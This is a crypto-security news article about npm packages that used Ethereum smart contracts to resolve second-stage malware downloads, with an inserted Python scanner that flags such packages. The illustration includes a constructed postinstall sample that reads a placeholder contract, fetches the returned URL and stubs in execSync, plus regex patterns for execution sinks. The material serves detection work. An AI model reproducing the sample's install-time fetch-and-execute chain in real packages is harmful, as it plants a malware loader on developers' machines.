A New Twist in Crypto Cyberattacks
Ethereum smart contracts are being weaponized to deliver malware, according to findings by security firm ReversingLabs. The company identified two malicious Node Package Manager (NPM) libraries—colortoolsv2 and mimelib2—that used Ethereum contracts as part of a malware distribution chain.
The technique forms part of what researchers describe as a “sophisticated campaign” aimed at compromising developers via poisoned blockchain-related code libraries.
⚠️ New RL threat research: 2 malicious #npm packages abuse #Ethereum smart contracts to load #malware on compromised devices. https://t.co/wzDRKfm2yh
— ReversingLabs (@ReversingLabs) September 3, 2025
How the Attack Works
The infected NPM packages each contained two files. One ran a script that queried an Ethereum smart contract, which returned the link to download the second-stage malware. Because the download address lived on-chain rather than in the package itself, this design allowed attackers to evade detection and to use the blockchain’s decentralized nature as an unconventional delivery method.
ReversingLabs uncovered that the malicious packages were connected to a wider network of GitHub repositories, many of which were branded as crypto trading bots or token sniping tools. While the NPM packages themselves were relatively simple, the repositories were dressed up to look authentic, with thousands of commits, stars, and even fake contributors.
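As an added illustration (not code from ReversingLabs or from the article), the following Python heuristic flags an npm package that shows all four stages of the chain described above: an install-time lifecycle hook, an Ethereum contract read, a remote fetch, and an execution sink. The indicator patterns and the two sample packages are constructed for this example and are not the real colortoolsv2 or mimelib2 contents.

```python
import json
import re

# Heuristic indicators for the four stages of the chain described above. They are
# this example's own assumptions, not ReversingLabs' detection rules.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
ETH_READ = re.compile(r"\beth_call\b|JsonRpcProvider|\bnew\s+Contract\s*\(|\bweb3\b", re.I)
REMOTE_FETCH = re.compile(r"\bhttps?\.get\s*\(|\bfetch\s*\(|\baxios\b")
EXEC_SINK = re.compile(r"child_process|\bexec(?:Sync)?\s*\(|\bspawn\s*\(|\bwriteFileSync\b")


def scan_package(package_json: str, sources: dict) -> dict:
    """Report which stages of a contract-resolved download chain a package exhibits."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    body = "\n".join(sources.values())
    findings = {
        "install_hooks": [h for h in INSTALL_HOOKS if h in scripts],
        "reads_contract": bool(ETH_READ.search(body)),
        "fetches_remote": bool(REMOTE_FETCH.search(body)),
        "executes_payload": bool(EXEC_SINK.search(body)),
    }
    # Only the full chain (runs at install, reads a contract, fetches, executes)
    # matches the campaign; partial matches are common in honest dapp tooling.
    stages = sum(bool(v) for v in findings.values())
    findings["verdict"] = "block" if stages == 4 else "review" if stages >= 2 else "pass"
    return findings


# Constructed samples (not the real colortoolsv2/mimelib2 contents).
SUSPICIOUS_MANIFEST = json.dumps({"name": "example-color-utils", "version": "1.0.0",
                                  "scripts": {"postinstall": "node setup.js"}})
SUSPICIOUS_SOURCES = {"setup.js": """
const { JsonRpcProvider, Contract } = require("ethers");
const https = require("https");
const { execSync } = require("child_process");
// Placeholder contract address and RPC endpoint.
const c = new Contract("0x0000000000000000000000000000000000000000",
                       ["function get() view returns (string)"],
                       new JsonRpcProvider("https://rpc.example.invalid"));
c.get().then(url => https.get(url, res => { /* save to disk, then execSync it */ }));
"""}
BENIGN_MANIFEST = json.dumps({"name": "example-dapp-helper", "version": "2.1.0",
                              "scripts": {"test": "jest"}})
BENIGN_SOURCES = {"index.js":
                  "const { JsonRpcProvider } = require('ethers');\n"
                  "module.exports = () => new JsonRpcProvider(process.env.RPC_URL);"}
```

Running `scan_package` over the two samples returns a "block" verdict for the constructed install-time downloader and "pass" for the library that merely talks to an RPC endpoint, which is the distinction a registry gate needs to make.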
Open Source: A Hidden Risk
The campaign highlights the dangers of trusting open-source software without verification. Attackers appear to be exploiting the assumption that public repositories are automatically safe because they are openly visible.
The poisoned packages demonstrate how fake reputational signals—like stars and activity—can lull developers into installing dangerous software.
Binance Identifies DPRK as Major Threat
Major crypto exchange Binance has already flagged package poisoning as a growing attack vector linked to North Korean state actors. Employees are required to carefully audit NPM libraries as part of internal security protocols.
Chainalysis previously reported that North Korean hackers were responsible for 61% of all stolen crypto in 2024, amounting to $1.3 billion. More recently, the FBI attributed the record $1.4 billion Bybit hack to DPRK-affiliated attackers, underscoring the scale of the threat.
A Growing Challenge for the Crypto Industry
The use of Ethereum smart contracts for malware delivery represents a significant escalation in tactics. Unlike traditional attack methods, this approach leverages blockchain’s transparency and decentralization, making it harder to shut down.
With state-sponsored hackers continually innovating, the crypto industry faces mounting pressure to bolster defenses. As Valentić warned, the sophistication of these campaigns signals that attackers are becoming more strategic, and open-source communities remain a prime target.
For developers and exchanges alike, vigilance is no longer optional—it is the frontline defense against a new era of blockchain-enabled cybercrime.